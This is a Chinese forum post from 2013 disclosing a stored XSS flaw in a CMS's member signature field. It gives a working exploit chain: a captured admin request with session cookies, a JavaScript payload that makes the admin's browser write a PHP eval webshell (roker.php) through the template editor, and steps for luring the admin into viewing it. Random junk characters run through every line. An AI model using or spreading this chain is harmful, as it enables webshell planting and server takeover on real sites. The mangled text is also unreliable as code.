|
|
这个cms 以前 90有人发了个getshell,当时 是后台验证文件的问题
4 U! W" T5 o% ]* N$ {1 X官网已经修补了,所以重新下了源码$ m6 A4 g) t i! w
因为 后台登入 还需要认证码 所以 注入就没看了。7 T( I( ~( r+ g; E. G
存在 xss* j1 D3 v' R& n. U
漏洞文件 user/member/skin_edit.php
2 g2 \- I1 K. I. [/ Y% h+ D8 ~本帖隐藏的内容<tr><td style="height:130px;"><span class="t"><i>*</i>签名:% u# V4 d+ E2 s% Y
; G% L( m# m6 L% R</span><textarea style="width:435px;height:120px;" id="content" name="CS_Qianm"><?php echo $cscms_qianm?>2 b+ ~7 M0 W7 V9 p1 v, \3 l
; i: f9 p, T$ Q% t) T' B8 e# X
</textarea></td></tr>5 O" q9 Q2 n8 S: @* t6 \2 E/ J3 K
% ]: }4 ?- V9 _$ e1 Z- \
user/do.php 2 ^- m. O. x! N
7 ?+ b {6 b. `6 l8 |9 v
S& |7 W" L9 o" z% qif($op=='zl'){ //资料
$ A% d. F5 m- q y2 {& h2 M2 T7 y 0 p" B6 u: ~$ b2 S9 _
if(empty($CS_QQ)||empty($CS_Nichen)||empty($CS_City)||empty($CS_Email)) 0 k5 f4 a2 Y w9 D
exit(Msg_Error('抱歉,请把资料填写完整!','javascript:history.go(-1);'));$ n7 Q9 J( s& ]7 g. w# P
0 }/ n O! m0 i/ b# G: M; N; D
$sql="update ".Getdbname('user')." set CS_Nichen='".$CS_Nichen."',CS_Email='".$CS_Email."',* |# J% f) v- T' ?
& {6 y* K; z7 ~3 c; O5 N CS_Sex=".$CS_Sex.",CS_City='".$CS_City."',CS_QQ='".$CS_QQ."',CS_Qianm='".$CS_Qianm."'7 d4 e0 X1 A( F( i: }* C
where CS_Name='".$cscms_name."'";
) U1 y7 O* x6 D/ C/ b
) H; k7 J! n, p7 Z g3 q if($db->query($sql)){
0 x5 F3 d' g! d( m
6 \3 d0 `1 O+ ]* e8 k- R% ~3 N exit(Msg_Error('恭喜您,修改成功了!','javascript:history.go(-1);'));& L6 `5 |: g0 C! y j' {
. k: ~- t2 Z8 ]% ~& {# G* ? }else{( |' L) R8 y/ A
* [7 X8 h: a _# e% w0 Y exit(Msg_Error('抱歉,修改失败了!','javascript:history.go(-1);'));$ y, ` ?3 K) S' T
0 ^/ _/ F+ e/ _% [3 @ ^
}
% W* c' ?* D) k% b" f* n2 ^0 r3 @* O
! X: F3 V. s4 z2 c
没有 过滤导致xss产生。( n1 l" w& V% k2 I# R/ [* p4 O
后台 看了下 很奇葩的是可以写任意格式文件。。8 d0 y* P& Q/ z: G @3 H
抓包。。$ B* H# Q. Q' I$ U+ V! k( T7 N/ d' ?
4 h# ]" K9 f( Q; y6 }& b8 X E
# Q0 `: \, i. f- w/ L% q
本帖隐藏的内容POST /admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/ HTTP/1.1
1 E2 n2 F& d# Q' ` 9 [0 \4 |, \" {) E
Accept: text/html, application/xhtml+xml, */*
) W- A7 L' P9 O' s% ?0 t/ e% O & Q' ]6 z9 z( k% A" s: g: L
Referer: http://127.0.0.1/admin/skins/ski ... l/&name=aaa.php
$ j! Q8 R5 [2 e( ~" y4 N
9 E5 X9 o3 I9 O C# G) A, GAccept-Language: zh-CN
' B: t0 Z* f; [2 u ! S4 U N5 p8 V2 p) A
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)9 p& U7 V @! @; p6 `5 x
& ]9 n( L; o/ a2 B$ L% ~3 q3 E. |5 h
Content-Type: application/x-www-form-urlencoded( q4 n. v* j% i( M0 [% E b3 @
" B* w- |9 I8 R# m3 rAccept-Encoding: gzip, deflate
5 W" s$ H6 U: b: |
8 P- X4 S3 X2 Z) u2 qHost: 127.0.0.1( p- I7 k0 N& t0 D5 o/ S' m% @
* Q2 M, M9 d, T$ X0 x- @- M% O
Content-Length: 38( M. ^5 X4 a8 N5 S- P5 j3 R+ J# D
% o4 e+ p) c% v
DNT: 1
, s% P! W* n |+ W6 F5 E" _; E
( m1 ]! |, l$ t6 k# v& E9 `# ~/ xConnection: Keep-Alive
) G( r- o5 s& D- p) m* b7 r
1 R0 `6 K7 X% _% BCache-Control: no-cache
8 w9 R( |7 s* u+ \) n/ m! K 6 S1 J! j3 P0 Y8 W
Cookie: CS_AdminID=1; CS_AdminUserName=aaaa; CS_AdminPassWord=12949e83a49a0989aa46ab7e249ca34d; CS_Quanx=0_1%2C1_1%2C1_2%2C1_3%2C1_4%2C1_5%2C2_1%2C2_2%2C2_3%2C2_4%2C2_5%2C2_6%2C2_7%2C3_1%2C3_2%2C3_3%2C3_4%2C4_1%2C4_2%2C4_3%2C4_4%2C4_5%2C4_6%2C4_7%2C5_1%2C5_2%2C5_3%2C5_4%2C5_5%2C6_1%2C6_2%2C6_3%2C7_1%2C7_2%2C8_1%2C8_2%2C8_3%2C8_4; CS_Login=980bb0dfb9c7ba8ac7676b6f4eea2c4b; CS_AdminUP=1; cs_id=2; cs_name=test; PHPSESSID=36db4a484bdbd090ad9846e3b7f65594) b- W. d; ?4 ?1 s
& M J' z. r8 f4 @2 K1 T$ M- {
. O- e8 w- ]# k8 m5 Mname=aaa.php&content=%3Cs%3E%3Ca%25%3E# E, t; j# T/ P& y# L
/ B1 B4 G3 F) P
3 G+ j1 i a, H& [3 a, w& ^, \' b" b4 K+ s
于是 构造js如下。- ~) ]. n" d, T$ F3 b
/ w! B) E/ s. M q9 z' p7 I& x4 k' \* p: w
本帖隐藏的内容<script>
1 J: z9 w/ d0 @thisTHost = top.location.hostname;
# r3 M( z+ U2 v/ h& F0 V- e: o' {0 X
+ t1 O& y: H4 F8 j, U2 |8 QthisTHost = "http://" + thisTHost + "/admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/";8 c, O8 ~; ^) R5 b( u. |1 k% r
6 n3 B: `9 r2 i- ?9 {
function PostSubmit(url, data, msg) {
6 I$ ?& [8 [# z3 z' h var postUrl = url;
/ |/ y+ Z# `; e0 p3 j$ a
0 y& K# j2 u6 h9 H w- z var postData = data;
3 B" i" S8 B( D( u b var msgData = msg;
2 V! x4 M% {+ j. W) ]& B var ExportForm = document.createElement("FORM"); 9 ~) M7 h3 U; J6 { g
document.body.appendChild(ExportForm);
, c- g8 [) P I' ?8 ^6 U: y0 V ExportForm.method = "POST"; , y" h5 E- L% P" Z+ o2 r
var newElement = document.createElement("input");
) i3 W. `& r7 e' t, X; F newElement.setAttribute("name", "name"); 7 |$ p0 z% ?2 W% A) k! }; A+ s
newElement.setAttribute("type", "hidden"); 9 Y3 J7 k$ P$ x/ r; ]- g
var newElement2 = document.createElement("input");
$ j0 `/ q, f' ?' L& i newElement2.setAttribute("name", "content"); ( k' P9 H) j$ a! _5 d
newElement2.setAttribute("type", "hidden"); - b+ h5 V x h" O; p7 i/ s# ?
ExportForm.appendChild(newElement); 4 W4 A1 W) l% H ?% x, s; T
ExportForm.appendChild(newElement2); , l6 U' U; a G: e
newElement.value = postData;
5 g4 S j2 b# x& [. C* ? newElement2.value = msgData;
" h2 h$ x) X" I" g+ e ExportForm.action = postUrl; + o& [ X+ t7 o$ X2 i" M
ExportForm.submit(); 6 l' q' b6 O6 Z# H1 {
};% O% r1 F4 ^8 v. ]4 [
7 o# }# N, j3 [% Y V/ Z0 G
PostSubmit(thisTHost,"roker.php","<?php @eval($_POST[123]);?>");
) v* K) W1 b3 B1 \5 B
8 T9 c8 \; W: r1 E6 f6 v* F</script>
, L+ W g( `$ {( `0 v
0 P0 L: D. F% }! l9 }. y2 y6 C+ F5 i8 G
# q V2 l& p i, S
http://127.0.0.1/user/space.php?ac=edit&op=zl 修改签名处 插入& e0 ~. d% p* R* C ?
用你的账号给管理写个 私信 或者让他访问 你的主页http://127.0.0.1/home/?uid=2(uid自己改)
$ q; r6 c/ P: L: o# x; _8 [6 V就会 在 skins\index\html\目录下生成 roker.php 一句话。 |
. b+ Y* W3 p4 O$ z
|
|
发表于 2013-11-6 18:09:37
收藏
支持
反对